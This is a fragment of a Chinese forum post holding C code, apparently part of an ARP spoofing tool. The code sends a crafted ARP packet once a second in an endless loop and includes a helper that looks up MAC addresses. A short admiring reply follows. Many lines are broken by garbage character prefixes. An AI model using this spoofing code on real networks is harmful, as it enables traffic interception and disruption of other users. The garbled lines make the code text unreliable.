1 v; n3 f8 D+ Z0 Y  J  memset(szArpBuff, 0, sizeof(szArpBuff));
0 z1 }8 Q3 x5 x% Y  l/ C4 U& X  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send arp packet
" d" I( F- Y* I6 I. R/ M2 _  while(1)
8 {7 ^/ v, ^  [6 P  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
    {
% V+ u( C: D- U& j1 T1 O9 C      printf("Error sending the arp spoof packets!\n");
      return 0;
    }
    Sleep(1000);
( i/ f$ ~/ C# k5 y' _) K! ^7 u  }
: F2 S3 D* K3 r1 D  return 0;
0 d* E+ B; E# U( s}
2 V4 n! E& A( s/ Q
% c: ?; ?- i! l* a+ u9 r0 \3 v//
//功能：输入IP取得对应的MAC地址
2 C- f0 Q+ ?  ^+ j% l( O6 A- M//
BOOL GetMACAddr(DWORD DestIP, char *pMAC)
2 n# A4 Z: S8 s9 @{
  DWORD  dwRet;
  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
  if(dwRet == NO_ERROR)
  {
    memcpy(pMAC, pulMac, 6);
    return TRUE;
0 o4 H8 |2 O" f( {2 u4 _  }
  else return FALSE;
}

wy617958197

大侠好厉害啊